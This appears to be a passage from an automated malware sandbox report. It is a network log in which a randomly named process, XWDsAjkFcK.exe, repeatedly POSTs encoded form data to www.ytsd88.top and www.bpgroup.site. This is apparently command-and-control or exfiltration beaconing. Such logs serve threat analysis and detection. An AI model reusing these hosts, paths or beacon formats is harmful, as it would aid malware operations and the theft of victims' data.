Jan 10, 2025 20:27:23.974621058 CET	731	OUT	POST /8qt7/ HTTP/1.1 Host: www.ytsd88.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.ytsd88.top Referer: http://www.ytsd88.top/8qt7/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 220 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Data Raw: 4b 7a 42 34 37 6e 56 3d 49 72 71 4f 51 36 78 65 37 33 49 49 69 74 39 47 4d 54 71 67 6b 72 66 4e 57 6d 51 6e 31 4c 46 67 4c 37 6f 71 6b 67 46 36 64 72 65 43 39 36 46 44 66 64 6b 6d 4c 44 66 52 6d 53 63 33 56 41 45 72 76 37 4a 47 65 38 59 5a 4a 6f 36 62 4c 47 70 69 7a 78 67 58 73 37 64 6a 66 33 55 78 56 6f 62 45 51 53 47 51 6b 46 63 58 61 55 41 66 6c 30 50 64 4e 79 38 6c 49 53 50 43 52 67 6b 42 52 4a 2b 4e 44 6e 4f 45 2b 4d 55 4f 64 78 44 47 4c 49 39 46 54 38 4f 73 72 38 38 69 50 58 58 34 72 44 37 61 66 2b 4b 35 49 6d 2f 45 4c 59 6a 49 34 6f 36 4c 62 54 50 59 42 49 4a 57 31 53 4e 42 35 36 4f 31 41 35 47 62 43 45 68 46 62 4c 2b 77 70 48 59 70 62 67 3d 3d Data Ascii: KzB47nV=IrqOQ6xe73IIit9GMTqgkrfNWmQn1LFgL7oqkgF6dreC96FDfdkmLDfRmSc3VAErv7JGe8YZJo6bLGpizxgXs7djf3UxVobEQSGQkFcXaUAfl0PdNy8lISPCRgkBRJ+NDnOE+MUOdxDGLI9FT8Osr88iPXX4rD7af+K5Im/ELYjI4o6LbTPYBIJW1SNB56O1A5GbCEhFbL+wpHYpbg==
Jan 10, 2025 20:27:24.879007101 CET	574	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 19:27:24 GMT Content-Type: text/html Content-Length: 409 Connection: close ETag: "66d016cf-199" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED] Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49978	47.76.213.197	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:27:26.521656990 CET	1744	OUT	POST /8qt7/ HTTP/1.1 Host: www.ytsd88.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.ytsd88.top Referer: http://www.ytsd88.top/8qt7/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 1232 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Data Raw: 4b 7a 42 34 37 6e 56 3d 49 72 71 4f 51 36 78 65 37 33 49 49 69 74 39 47 4d 54 71 67 6b 72 66 4e 57 6d 51 6e 31 4c 46 67 4c 37 6f 71 6b 67 46 36 64 72 57 43 39 49 39 44 66 38 6b 6d 5a 54 66 52 6f 79 63 4d 56 41 45 4d 76 34 35 43 65 38 55 4a 4a 71 43 62 5a 56 68 69 6e 51 67 58 33 4c 64 6a 41 48 55 77 4e 49 62 52 51 53 58 5a 6b 45 73 58 61 55 41 66 6c 32 48 64 5a 58 49 6c 4b 53 50 42 5a 41 6b 4e 56 4a 2b 6c 44 6d 71 55 2b 4e 67 77 63 41 6a 47 4c 6f 4e 46 63 75 57 73 32 4d 38 67 4f 58 58 67 72 44 33 52 66 2b 57 31 49 6d 4c 75 4c 59 62 49 31 73 37 4c 45 79 33 51 63 62 70 32 72 68 39 55 32 64 47 6d 4d 39 7a 46 57 57 35 48 49 35 4c 37 2f 6a 78 48 47 74 73 65 69 72 51 42 30 36 2f 31 50 4c 6b 69 5a 67 37 6f 51 6c 42 35 44 48 6b 42 41 6d 4d 65 69 62 32 4f 50 55 55 46 47 2b 79 6f 37 30 42 72 7a 6b 71 79 63 6f 53 47 44 50 6b 45 69 4b 54 75 64 73 68 34 47 4a 6e 6a 4a 48 65 46 54 34 72 48 51 6d 33 6c 43 49 57 6d 62 72 30 4d 66 4e 59 62 79 66 51 56 56 67 6e 39 63 54 2f 41 6b 4a 42 32 46 6f 44 38 77 79 57 50 34 6f [TRUNCATED] Data Ascii: KzB47nV=IrqOQ6xe73IIit9GMTqgkrfNWmQn1LFgL7oqkgF6drWC9I9Df8kmZTfRoycMVAEMv45Ce8UJJqCbZVhinQgX3LdjAHUwNIbRQSXZkEsXaUAfl2HdZXIlKSPBZAkNVJ+lDmqU+NgwcAjGLoNFcuWs2M8gOXXgrD3Rf+W1ImLuLYbI1s7LEy3Qcbp2rh9U2dGmM9zFWW5HI5L7/jxHGtseirQB06/1PLkiZg7oQlB5DHkBAmMeib2OPUUFG+yo70BrzkqycoSGDPkEiKTudsh4GJnjJHeFT4rHQm3lCIWmbr0MfNYbyfQVVgn9cT/AkJB2FoD8wyWP4owKL93oqKzPjQKjTFrieUzNFlPQQuatsRrn/sbjRHxGx/fhvY3W59e/piC7+NM4PsuVjRvWOjtMj6PFyzKcblFXasa4Ve/J9mnRknRfqWZ1GhlSxeibNNzY6ssfMyndbPoapFGjc2iocmljsRV3kPxAkdLpBMxOV+erlk5i6GyG2bIxGGp37QnU5zgnnIB/zGZ9hy/ZxQcQPRu2rdXTZOVeAHlhNzWc2lgV8w9MlToDoxl7tzFDPtnVCNh4VuoOC2SySiBS6mIgagvatfSkRuaFJ+Ze/s7b9hyvRZT7oSMuFkgU7wzv79Zym5kNh4nxCKo8BqXsgE6J3W8JP4sEyHsFqcSKEKmLmooSzkzu9v92Pl8gk340nMalaPRSv8U37wpdAl3G6oYYhzykUCoKIlYvZcRY43GPfFUp9ILAW4Eaclb+jZwo+z7FcVTnZPNrPCd7h64sMCj/32adCL7yCWAee1649NJTS9E1OzSVrGMDIoV1XE5Ii86Yt64CkTI030I2GEs2iIT+pN0UBF464LI51Yg+zRg4rFqcltEESxOYzTei2z+hjbjk7p3D88hQLrAOB8sE3JcXr3EOG4T5xcp/uB0UEuuK2srMPCaS3X9EiSAPCiLsPmfpEKxy9yk66ERCCT/HFRSEp6Uf7d6s5Ma1xCi109hNY0lq [TRUNCATED]
Jan 10, 2025 20:27:27.630928040 CET	574	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 19:27:27 GMT Content-Type: text/html Content-Length: 409 Connection: close ETag: "66d016cf-199" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED] Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49979	47.76.213.197	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:27:29.109637022 CET	453	OUT	GET /8qt7/?KzB47nV=FpCuTMU+yGtduI5RRmSeut/xWTwd9fsLSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXspxWYm91P5vgQDerxUIIQwwTsV+rYA==&ity41=G4jxKXr HTTP/1.1 Host: www.ytsd88.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Jan 10, 2025 20:27:30.033190966 CET	574	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 19:27:29 GMT Content-Type: text/html Content-Length: 409 Connection: close ETag: "66d016cf-199" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 73 74 79 6c 65 3e 0a 09 2e 62 74 6c 69 6e 6b 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 32 30 61 35 33 61 3b 0a 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 35 70 78 22 20 3e 50 6f 77 65 72 20 62 79 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6c 69 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 74 2e 63 6e 2f 3f 66 72 6f 6d 3d 34 30 34 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e5 a0 a1 e5 a1 94 20 28 e5 [TRUNCATED] Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49980	74.48.143.82	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:27:35.534235954 CET	713	OUT	POST /mlxg/ HTTP/1.1 Host: www.bpgroup.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.bpgroup.site Referer: http://www.bpgroup.site/mlxg/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 196 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Data Raw: 4b 7a 42 34 37 6e 56 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 34 5a 68 66 33 66 42 76 31 69 59 76 48 7a 56 4f 34 37 6f 7a 48 38 47 76 63 62 6c 78 72 43 49 39 34 41 61 65 41 74 50 6f 4d 45 67 54 7a 45 47 5a 41 37 75 6c 78 37 42 42 57 38 44 55 30 35 77 78 58 70 4c 48 62 76 4b 4f 73 39 38 5a 44 62 4c 47 69 7a 73 76 52 53 6b 74 6d 4e 73 35 38 36 44 77 58 47 49 66 46 61 4c 31 54 79 53 4f 57 6c 50 70 43 58 78 61 30 74 35 32 6f 57 2f 42 62 76 38 41 44 76 70 78 4d 2f 38 74 4c 50 7a 56 6e 4f 37 68 70 66 58 6f 67 34 74 58 78 65 56 45 36 74 31 70 49 74 38 71 33 74 6b 73 61 66 47 73 46 77 41 Data Ascii: KzB47nV=RSb5LTpCCFtBU4Zhf3fBv1iYvHzVO47ozH8GvcblxrCI94AaeAtPoMEgTzEGZA7ulx7BBW8DU05wxXpLHbvKOs98ZDbLGizsvRSktmNs586DwXGIfFaL1TySOWlPpCXxa0t52oW/Bbv8ADvpxM/8tLPzVnO7hpfXog4tXxeVE6t1pIt8q3tksafGsFwA
Jan 10, 2025 20:27:36.087412119 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Fri, 10 Jan 2025 19:27:35 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 10, 2025 20:27:36.087450027 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49981	74.48.143.82	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:27:38.083345890 CET	737	OUT	POST /mlxg/ HTTP/1.1 Host: www.bpgroup.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.bpgroup.site Referer: http://www.bpgroup.site/mlxg/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 220 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Data Raw: 4b 7a 42 34 37 6e 56 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 59 70 68 63 55 33 42 2f 6c 69 5a 6a 6e 7a 56 45 59 37 73 7a 48 41 47 76 59 44 31 78 5a 57 49 39 5a 77 61 50 78 74 50 6b 73 45 67 59 54 46 4f 64 41 37 6c 6c 78 32 2b 42 55 6f 44 55 30 74 77 78 57 5a 4c 47 73 44 4a 63 73 39 2b 52 6a 62 46 49 43 7a 73 76 52 53 6b 74 6d 5a 47 35 38 69 44 77 48 32 49 5a 6b 61 49 30 54 79 54 50 57 6c 50 74 43 58 31 61 30 74 68 32 70 62 55 42 64 7a 38 41 43 66 70 78 34 6a 2f 2b 72 50 31 4c 58 50 50 6f 64 53 6c 67 41 6f 6f 66 52 57 57 65 35 45 51 75 70 51 37 37 6d 4d 7a 2f 74 44 49 69 44 46 71 57 57 6a 35 73 64 76 37 37 4a 37 74 4a 4d 49 71 75 6b 31 4a 43 67 3d 3d Data Ascii: KzB47nV=RSb5LTpCCFtBUYphcU3B/liZjnzVEY7szHAGvYD1xZWI9ZwaPxtPksEgYTFOdA7llx2+BUoDU0twxWZLGsDJcs9+RjbFICzsvRSktmZG58iDwH2IZkaI0TyTPWlPtCX1a0th2pbUBdz8ACfpx4j/+rP1LXPPodSlgAoofRWWe5EQupQ77mMz/tDIiDFqWWj5sdv77J7tJMIquk1JCg==
Jan 10, 2025 20:27:38.639672995 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Fri, 10 Jan 2025 19:27:38 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 10, 2025 20:27:38.639697075 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49982	74.48.143.82	80	6544	C:\Program Files (x86)\smSQBkHUEFknNGGoDrpEEHwhuuhSmTeysCakbQUJBfEfolKBqDUwbKofWcpf\XWDsAjkFcK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:27:40.630244970 CET	1750	OUT	POST /mlxg/ HTTP/1.1 Host: www.bpgroup.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Origin: http://www.bpgroup.site Referer: http://www.bpgroup.site/mlxg/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 1232 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Data Raw: 4b 7a 42 34 37 6e 56 3d 52 53 62 35 4c 54 70 43 43 46 74 42 55 59 70 68 63 55 33 42 2f 6c 69 5a 6a 6e 7a 56 45 59 37 73 7a 48 41 47 76 59 44 31 78 5a 4f 49 38 72 34 61 64 69 46 50 71 4d 45 67 44 7a 46 4e 64 41 37 43 6c 78 75 79 42 55 6b 31 55 32 56 77 77 77 74 4c 42 64 44 4a 57 73 39 2b 64 44 62 49 47 69 79 30 76 52 43 67 74 6d 4a 47 35 38 69 44 77 42 79 49 65 31 61 49 35 7a 79 53 4f 57 6c 35 70 43 58 64 61 30 46 78 32 70 65 76 42 72 44 38 41 69 50 70 71 72 4c 2f 39 4c 50 33 4b 58 50 58 6f 61 61 2b 67 41 6b 65 66 53 4b 34 65 35 73 51 73 38 4e 76 69 33 34 32 38 76 66 51 74 41 39 75 62 33 53 51 67 73 37 38 32 6f 66 6d 63 4d 46 68 75 6c 59 54 65 69 77 44 45 4d 66 62 38 30 6b 61 35 58 65 33 33 76 75 72 73 6f 49 6d 51 4e 72 59 75 46 36 55 4c 52 61 67 34 5a 4d 72 6d 58 4c 6e 62 6e 79 53 77 79 71 69 31 69 78 70 42 6c 7a 68 78 4f 79 66 6b 73 49 33 71 56 41 36 6b 41 43 74 7a 6d 48 6b 51 6d 4d 71 6b 37 55 33 61 44 61 35 47 55 78 53 72 73 32 31 6a 55 32 76 31 6a 67 45 6b 4b 35 64 4a 67 36 43 75 58 4c 77 70 69 [TRUNCATED] Data Ascii: KzB47nV=RSb5LTpCCFtBUYphcU3B/liZjnzVEY7szHAGvYD1xZOI8r4adiFPqMEgDzFNdA7ClxuyBUk1U2VwwwtLBdDJWs9+dDbIGiy0vRCgtmJG58iDwByIe1aI5zySOWl5pCXda0Fx2pevBrD8AiPpqrL/9LP3KXPXoaa+gAkefSK4e5sQs8Nvi3428vfQtA9ub3SQgs782ofmcMFhulYTeiwDEMfb80ka5Xe33vursoImQNrYuF6ULRag4ZMrmXLnbnySwyqi1ixpBlzhxOyfksI3qVA6kACtzmHkQmMqk7U3aDa5GUxSrs21jU2v1jgEkK5dJg6CuXLwpiVFkn6qB9mBgfZPAuP3baXzhTvRMCyYHu1rcdwfx5f8llCVFRShhM+UVDIBdc5QSD7NN/0H/IS4f14FkRY/gjLiZ8v924mK4QHRGTfHASVEYK9Z7jFfN0hYwUKiJU25yXQz+2yitkE5qOw40kDa8Ia4jHMbtjSO/2mIWXVG8Z6Gt48zFgs0VxVSdgkWwPwCs6pQSHFq0q/hjmicmn+/WCaXh0wdI5mkGdGX5vzFC2h6Ht5TbcuNr7VaOk1K+mYZf22JsYOD15zvP8wu4abVZOpgH5ITxJqKaiJ7ugBK8XrE+JBiqJgNGbJ+8Z637JqoAYouY1VFXtiN01ymY3ejSbNCeNwMQvXqTF1tSYTuGBtFHLEhDGTaF+mJ1JOJfnO16nqCiYmuVxggXifudbyogygpWdpaeNpN4a9RyBKLFaiqLPyi98OhYF7LjHu10bcAt8mSP/lgFFlKm07ae/7HaIZduJ1wbRuF6mKDpaY6vRlN2LNGq3gQboSJiM/paHfLhpMvUlNKXwaR/mAvYEC/Oo2UIaHShOE6xz95Att4DiqIVHgUjiO8k1dfB54hQXpw0kdAAaANFcyi8Ke8tMmdex5vrOaUYeRSNWiHmNm4YOSN4TZIXWYSEhrSUf+SsmW/HZ33tHrIVNlnoZ1pVfgdErhkXnZNephf4dVY [TRUNCATED]
